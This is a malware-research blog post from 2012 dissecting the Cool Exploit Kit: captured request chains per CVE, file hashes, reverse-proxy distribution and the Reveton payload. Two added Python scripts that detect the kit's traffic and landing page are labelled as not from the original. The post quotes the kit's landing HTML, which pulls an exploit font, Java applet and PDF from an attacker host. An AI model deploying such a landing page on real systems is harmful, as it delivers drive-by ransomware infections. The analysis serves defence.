2012-10-09 - Landscape

Cool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop

Stats page title


Sorry for the "read it live" post...the situation was moving while writing.

A few days ago I discovered that a bunch of reverse proxies that I was linking to the same Blackhole Exploit Kit were in fact linked to 2 different Blackhole servers (quite surely operated by the same team - I saw reverse proxies being redirected from one server to another one).

Trying to build a signature to know which server was behind a specific reverse, I found a new exploit kit.



Empty default stats

I quickly noticed a few things.
/r/pricelist.php is a PDF exploit.
/r/myadv.php is a Java pack.
/font.php is a Reveton PE.


I thought it would take weeks before it went wild...but yesterday Malekal caught a landing spreading Reveton (blood.falawllp.info /r/l/town-proved.php ) and I immediately recognized that new EK. So I hunted the malvertising and found another domain with the same landing, pointing to an already known reverse proxy.

Seems like it was time to take a deep look at this EK.

Small improvement, it looks like the "Sploit pack" is being checked by tools like Scan4you.




When I first checked it, the payload was not being pushed (all night long: no payload).

CVE-2012-4681 - IE - WinXP 32b
try.addsdice.com /r/l/town-proved.php <-- try.addsdice.com full of meaning no ?
try.addsdice.com /r/32size_font.eot <- ?
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/myadv.php.pack.gz <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/l//r/f.php?k=1 <-- Vuln tracer for owner (seems guest does not have access to vuln break %)


CVE-2012-4681 - Firefox - WinXP 32b
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/l//r/f.php?k=1

CVE-2012-0507 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot  <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx  /r/l//r/f.php?k=2

CVE-2012-1723 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot  <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /favicon.ico
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/f.php?k=4


MDAC (you should not be hurt):
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/32size_font.eot
21x.xx.11x.1xx /r/pricelist.php


Not up to date Win7 64b - IE - (j7u7)
Note that there is NO payload on the EK right now; I don't know how to be 100% sure the CVE is indeed active, and whether it's this CVE which is being used or a new thing...
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/64size_font.eot
try.addsdice.com /r/pricelist.php
try.addsdice.com /favicon.ico
try.addsdice.com /r/f.php?k=4  <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
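As an added defender-side example (not from the original post), here is a small Python script that walks proxy-style log lines and flags clients that followed the request chain captured above: landing, font drop, PDF, jar and the f.php?k= tracer. The log format ("client host path") and the sample lines are constructed for the example.

```python
import re
from collections import defaultdict

# Request-path stages of the Cool EK chain as seen in the captures above,
# in the order the landing pulls them: landing, font drop, PDF, jar, tracer.
STAGES = [
    ("landing", re.compile(r"^/r/l/[\w-]+\.php$")),
    ("font_eot", re.compile(r"^/r/(?:32|64)size_font\.eot$")),
    ("pdf", re.compile(r"^/r/pricelist\.php$")),
    ("jar", re.compile(r"^/r/myadv\.php(?:\.pack\.gz)?$")),
    ("tracer", re.compile(r"^(?:/r/l/)?/r/f\.php\?k=(\d+)$")),
]
ORDER = [name for name, _ in STAGES]
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")  # assumed format: "client host path"

def classify_path(path):
    # Returns (stage, tracer k or None); (None, None) when the path is not a stage.
    for name, rx in STAGES:
        m = rx.match(path)
        if m:
            return name, (m.group(1) if m.groups() else None)
    return None, None

def find_cool_ek_chains(lines):
    # Group requests per (client, host); report pairs that hit the landing
    # plus at least one of the font / PDF / jar stages.
    seen = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            client, host, path = m.groups()
            stage, k = classify_path(path)
            if stage:
                seen[(client, host)].append((stage, k))
    hits = {}
    for key, stages in seen.items():
        names = [s for s, _ in stages]
        if "landing" in names and any(n in names for n in ("font_eot", "pdf", "jar")):
            ks = [k for s, k in stages if s == "tracer"]
            hits[key] = {"stages": sorted(set(names), key=ORDER.index),
                         "tracer_k": ks[-1] if ks else None}
    return hits
# Constructed sample: one client walking the whole chain on the page's host.
SAMPLE_LOG = """\
10.0.0.5 try.addsdice.com /r/l/town-proved.php
10.0.0.5 try.addsdice.com /r/64size_font.eot
10.0.0.5 try.addsdice.com /r/pricelist.php
10.0.0.5 try.addsdice.com /r/myadv.php
10.0.0.5 try.addsdice.com /r/f.php?k=4
""".splitlines()
```

A lone hit on /r/pricelist.php without the landing is not reported, which keeps the rule from firing on a single unrelated path.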


town-proved.php with IE contains:

<style>@font-face{font-family:'p1';src:url('http://BEEPBEEP/64size_font.eot');}.duqu{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style>
</head>
<body onload='try{window.focus();}catch(e){}'>
<div class='duqu'>:)</div>
<applet archive='http://BEEPBEEP/myadv.php' code='ja.jh' width='468' height='200'></applet>
<br><br>
<iframe src='http://BEEPBEEP/pricelist.php' width='468' height='468'></iframe>
</body></html>

Source code of the landing pushed to IE on x64 windows


.duqu <- ouch, exactly what we could expect from a font drop!
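Added example, not part of the original post: a Python triage of the landing source above that extracts the @font-face .eot URL, the applet archive and the iframe target, and flags a page that stacks all three as Cool EK-like. It assumes the landing is available as a string; the quoted snippet, with the author's BEEPBEEP redaction, is the sample.

```python
import re
from html.parser import HTMLParser

# Pulls the src url(...) out of each @font-face block found in a <style> element.
FONT_FACE_RE = re.compile(
    r"@font-face\s*\{[^}]*?src\s*:\s*url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I | re.S)

class LandingTriage(HTMLParser):
    """Collects the three objects the Cool EK landing stacks on one page:
    a remote .eot font loaded via @font-face, a Java applet and an iframe."""
    def __init__(self):
        super().__init__()
        self.in_style = False
        self.eot_fonts, self.applets, self.iframes = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "style":
            self.in_style = True
        elif tag == "applet" and a.get("archive"):
            self.applets.append((a["archive"], a.get("code")))
        elif tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        if self.in_style:  # only look at CSS, not page text
            self.eot_fonts += [u for u in FONT_FACE_RE.findall(data)
                               if u.lower().endswith(".eot")]

def triage_landing(html):
    """Return the extracted URLs plus a verdict: all three objects present."""
    p = LandingTriage()
    p.feed(html)
    p.close()
    return {"eot_fonts": p.eot_fonts, "applets": p.applets, "iframes": p.iframes,
            "cool_ek_like": bool(p.eot_fonts and p.applets and p.iframes)}

# The landing source quoted above (BEEPBEEP is the author's redacted host).
SAMPLE_LANDING = ("<style>@font-face{font-family:'p1';src:url('http://BEEPBEEP/64size_font.eot');}"
    ".duqu{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}"
    "</style></head><body onload='try{window.focus();}catch(e){}'><div class='duqu'>:)</div>"
    "<applet archive='http://BEEPBEEP/myadv.php' code='ja.jh' width='468' height='200'></applet>"
    "<br><br><iframe src='http://BEEPBEEP/pricelist.php' width='468' height='468'></iframe>"
    "</body></html>")
```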


Cool EK Tree


file.dll is a Reveton.
myadv.php (jar) - at least CVE-2012-4681, CVE-2012-0507, CVE-2012-1723
0383be9bdb140f4588f5fb7c14d29fbd


CVE-2012-4681 spotted in jar file from Cool EK


pricelist.php (pdf) - CVE-2010-0188
3bffc22ce0e67144c1b10da968f32f4c (2012-10-03) - http://wepawet.iseclab.org/view.php?hash=3bffc22ce0e67144c1b10da968f32f4c&t=1349739053&type=js

32size_font.eot : 050fbef5c814b2981fa61b7fc6820cbd
64size_font.eot : fada0b184b5372863a0c51f7fef5e2d0

How good is the "breaking" percentage?
Guest stats on 1 thread (we can estimate that it's Reveton infection via one traffer)

Stats are moving and I can't get infected by that thread. Looks like they are testing the EK in Traffic Analyser mode.

[EDIT - While Writing this post]

Around 10am French time I got infected. As expected: Reveton.
So the Exploit Kit moved to production mode again.

Tried to run the landing on a CVE-2011-3402 positive computer with Java 7u7: got infected (but it's not Java).

Payload: f15df53d8cca428d2dbe924fe1dff733
Reveton for those who do not know (look botnets.fr/index.php/Reveton)

Ran it on a fully patched IE 8 on Windows x64 with Java 7u7: no infection.


Tried to run the landing on a "Not up to date Win7 x64" positive computer without Java: got infected.


Payload : 106f1f7e3a24d1ae9af0efc0934a4dcb

Call Home from that Reveton payload.


Around 10:30 am : Malekal just found a new domain matching a known Reverse proxy that just switched from one BH EK server to this BH + Cool EK server.


I do not know what this font is about.
Is this a "new (?)" enabler for CVE-2012-4969? Is this another patched vuln from Internet Explorer?
I am getting help to sort this out. Will update this post.

<edit1> Got an answer from Kaspersky Labs: it's CVE-2011-3402,
so I s/CVE-2012-4969/CVE-2011-3402/ this post...yes, not ethical ;)
On my MDAC VM:
KB2676562 fixes CVE-2011-3402
Removing it should allow exploitation - work in progress.

</edit1>
<edit2>
After fighting for hours with updates and this EK (that was not cool, trust me), it seems that if you have at least one of these components installed, you are not vulnerable to the "Duqu-like" font drop:
-KB2676562 - CVE-2011-3402
-KB2744842 - CVE-2012-4969
-KB2718523 - CVE-2012-1893/CVE-2012-1890
-Windows Explorer 9.0
Downgrading a Windows 7 x64 to see which "missing" KB is required to get owned
-= means I removed this patch.
Sounds not so awful. I will add all MD5s, VT links etc...and my future edit should be the libtiff path if I find time, adding a map of the distribution of reverse proxies and maybe a link to the detailed/technical explanation of this "Duqu-like" font drop, if someone works on it.
</edit2>
<edit4 15/10/12> Added the Cool EK PokeAMole Board

Here is its distribution, to play Poke A Mole with the defense:
Cool EK Poke A Mole Board (snapshot as I see it on 13/10/2012)
Explanation/Disclaimer at the end - Edit4
Too small? : http://i.minus.com/ibbdTxd1LpqqHr.jpg




Credits for Components used in this model : http://pastebin.com/HsugYbhL

Explanation :

One server = One IP am aware of, on the 13/10/2012
One rectangle = /24 range
One color/server model  = One AS
One traffer = One thread am aware of (quite sure there is more)


Disclaimer: this is a schema focused on the Cool EK "PokeAMole" architecture and threads. We do not describe what happens before the binary is pushed on the EK, nor after infection events.
So things are in some way
- simplified: traffers often have the same kind of architecture (many IPs hiding a main server (TDS, fake adv server, etc...)), there are often traffic exchange platforms increasing the number of hops, traffers can sometimes be fed by botnets and are often fed by emailing/iframes on compromised servers (so other actors/hats are in the loop, selling credentials, pushing iframes).
There is a live case where automation is so well done that two (it seems) guys can handle many hats (gathering credentials, mass iframing/emailing, traffic, EK, pushing Zbot/Pony, and gathering credentials...perpetual motion ;) ).
- complexified: for instance on AS57999, it would be really surprising if there were more than one server. In my opinion the PokeAMole there is just a game of IP/routing configuration.
But from outside what you face is the same as what is represented here + domain name rotation.

</edit4>


<edit3 without comment 12/10/12>
New parameters e and f are appearing in the payload URL :
</edit3>

<edit5 28/10/12> It seems that since 25/10/2012 you now need direct access to get the final payload via the Java payload.

Here are files to check by yourself (always happy to have feedback ;) ):
Jar Before & After (OwnCloud via Goo.gl)
Fiddler Before & After (OwnCloud via Goo.gl)
</edit5>

Post Publication reading:
CVE-2011-3402 and Cool Exploit Kit - 2012-11-28 - yomuds - a bunch of random security bits!